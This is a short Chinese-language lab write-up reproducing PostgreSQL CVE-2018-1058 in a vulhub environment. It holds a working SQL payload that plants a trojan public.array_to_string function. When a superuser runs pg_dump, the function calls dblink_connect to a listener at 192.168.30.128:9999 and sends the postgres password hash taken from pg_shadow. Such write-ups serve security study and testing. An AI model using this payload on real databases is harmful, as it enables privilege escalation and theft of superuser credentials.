漏洞简介

PostgreSQL是PostgreSQL开发组所研发的一套自由的对象关系型数据库管理系统。该系统支持大部分SQL标准并且提供了许多其他特性，例如外键、触发器、视图等。 PostgreSQL 9.3版本至10版本中存在安全漏洞。攻击者可利用该漏洞以超级用户的权限执行代码。
参考文章：https://vulhub.org/#/environments/postgres/CVE-2018-1058/

漏洞复现

我们先通过普通用户vulhub:vulhub的身份登录postgres: psql --host your-ip --username vulhub
执行如下语句后退出：

CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
    select dblink_connect((select 'hostaddr=192.168.30.128 port=9999 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
    SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;

然后我在192.168.30.128上监听9999端口，等待超级用户触发我们留下的这个“后门”。

（假装自己是超级用户）在靶场机器下，用超级用户的身份执行pg_dump命令：docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub，导出vulhub这个数据库的内容。
执行上述命令的同时，“后门”已被触发，监听端口上已收到敏感信息：